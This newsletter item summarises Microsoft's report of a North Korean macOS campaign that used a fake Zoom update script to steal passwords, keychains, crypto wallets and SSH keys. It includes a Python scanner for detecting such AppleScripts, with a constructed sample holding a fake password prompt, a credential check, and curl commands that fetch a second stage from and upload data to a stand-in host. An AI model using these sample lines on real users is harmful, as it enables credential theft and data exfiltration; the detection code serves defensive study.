MICROSOFT

Cute little scam

Microsoft says a North Korean hacking group it tracks as Sapphire Sleet is behind a new macOS campaign aimed at people working in crypto, finance, and blockchain.

Instead of exploiting a software vulnerability, the group tricked users into opening a fake Zoom update file.

The file looked harmless, but it was really a script: once opened in Apple's Script Editor, it quietly downloaded more malware.

That gave the attackers a way to steal passwords, collect sensitive files, and keep persistent access to the device.

One stage of the attack showed a fake macOS password pop-up that looked genuine.

If the user typed in their password, the malware verified that it was correct and then sent it to the attackers.

The malware also changed macOS privacy settings, giving itself access to more data without triggering the usual permission prompts.
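The combination described above (a hidden-answer password dialog, a check that the password is real, and shell commands that download or upload) is something defenders can look for in AppleScript files before anyone double-clicks them. The scanner below is an added example written for this newsletter, not code from Microsoft's report or from the campaign itself. The two AppleScript sources it scans are constructed for the demonstration; the `dscl . -authonly` rule assumes the common way scripts validate a typed password and is not something the article states the malware used.

```python
import re

# Constructed sample AppleScript sources (not real malware) for the scanner to
# run over: a harmless automation script and one that follows the pattern the
# article describes, i.e. a hidden-answer password dialog paired with shell
# commands that validate the password, fetch a second stage and upload data.
SAMPLES = {
    "benign_zoom_helper.scpt": '''
tell application "zoom.us" to activate
display dialog "Zoom will restart to apply the update." buttons {"OK"}
''',
    "fake_update.scpt": '''
display dialog "Zoom needs your password to finish the update" default answer "" with hidden answer
set pw to text returned of result
do shell script "dscl . -authonly $USER " & quoted form of pw
do shell script "curl -fsSL http://203.0.113.10/stage2 -o /tmp/.zoom_update"
do shell script "curl -X POST --data-binary @/tmp/out.tar http://203.0.113.10/upload"
''',
}

# Heuristic rules, each applied line by line. Rule names are assumptions made
# for this example; tune the patterns to your own environment.
RULES = {
    # AppleScript's masked-input dialog: the building block of a fake password prompt.
    "hidden_password_prompt": re.compile(r"display\s+dialog.*with\s+hidden\s+answer", re.I),
    # Assumed check: validating the typed password against the local directory service.
    "credential_check": re.compile(r"dscl\b.*-authonly", re.I),
    # A shell download that writes a remote file to disk (second-stage fetch).
    "remote_download": re.compile(r"do\s+shell\s+script.*\b(curl|wget)\b.*https?://.*\s-o\b", re.I),
    # A shell upload of local data to a remote host (exfiltration).
    "exfiltration": re.compile(r"do\s+shell\s+script.*\bcurl\b.*(-X\s*POST|--data|--upload-file|-T\s)", re.I),
}


def scan_applescript(source: str) -> list[str]:
    """Return the names of the rules that fire on any line of the script, in rule order."""
    hits = []
    for name, pattern in RULES.items():
        if any(pattern.search(line) for line in source.splitlines()):
            hits.append(name)
    return hits


def is_suspicious(source: str) -> bool:
    """A hidden-answer prompt on its own is used by legitimate admin scripts, so
    only flag a script when the prompt is paired with a credential check or
    with network activity."""
    hits = set(scan_applescript(source))
    return "hidden_password_prompt" in hits and bool(
        hits & {"credential_check", "remote_download", "exfiltration"}
    )


def scan_all(samples: dict[str, str] = SAMPLES) -> dict[str, list[str]]:
    """Scan every sample and map its name to the rules that fired."""
    return {name: scan_applescript(src) for name, src in samples.items()}


if __name__ == "__main__":
    for name, hits in scan_all().items():
        verdict = "SUSPICIOUS" if is_suspicious(SAMPLES[name]) else "ok"
        print(f"{name}: {verdict} {hits}")
```

Run it against real `.scpt` or `.applescript` sources by reading the file text into `scan_applescript`; compiled scripts first need to be decompiled with `osadecompile` before the text rules can see anything. The point of `is_suspicious` is the pairing, not any single pattern: a masked password dialog is normal in IT automation, but a masked dialog followed by a credential check and a download is the shape of the lure this article describes.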

In brief:

  • The attack used a fake Zoom update instead of a software exploit.

  • It relied on fake prompts and built-in Apple tools, rather than exploits, to steal passwords and data.

  • Apple and Microsoft have both added protections, but the campaign shows how effective social engineering still is.

Evil zoom?

Microsoft said the attackers stole browser data, keychain contents, Telegram sessions, crypto wallet files, SSH keys, Apple Notes, and system logs. 

Apple has since added protections to block parts of the campaign, and Microsoft has shared guidance to help security teams spot similar attacks.

The bigger point is simple: attackers do not always need to break into a system if they can convince a user to let them in.

Big yikes. - MV
